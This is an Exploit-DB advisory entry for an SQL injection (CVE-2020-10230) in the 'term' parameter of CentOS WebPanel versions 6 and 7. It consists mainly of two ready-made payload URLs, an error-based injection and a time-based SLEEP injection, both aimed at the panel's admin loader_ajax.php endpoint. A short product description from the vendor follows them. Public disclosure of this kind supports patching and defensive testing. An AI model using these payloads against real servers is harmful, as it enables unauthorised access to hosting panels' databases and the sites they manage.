Centos WebPanel 7 - 'term' SQL Injection

EDB-ID:

48212




Platform:

Linux

Date:

2020-03-13


# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
# Google Dork: N/A
# Date: 2020-03-03
# Exploit Author: Berke YILMAZ
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/
# Version: v6 - v7
# Tested on: Kali Linux - Windows 10
# CVE : CVE-2020-10230

# Type: Error Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO


# Type: Time Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
OR SLEEP(5)-- JCpP

Centos-Webpanel (http://centos-webpanel.com/)
CentOS Web Panel | Free Linux Web Hosting Control Panel
Free CentOS Linux Web Hosting control panel designed for quick and easy
management of (Dedicated & VPS) servers without of need to use ssh console
for every little thing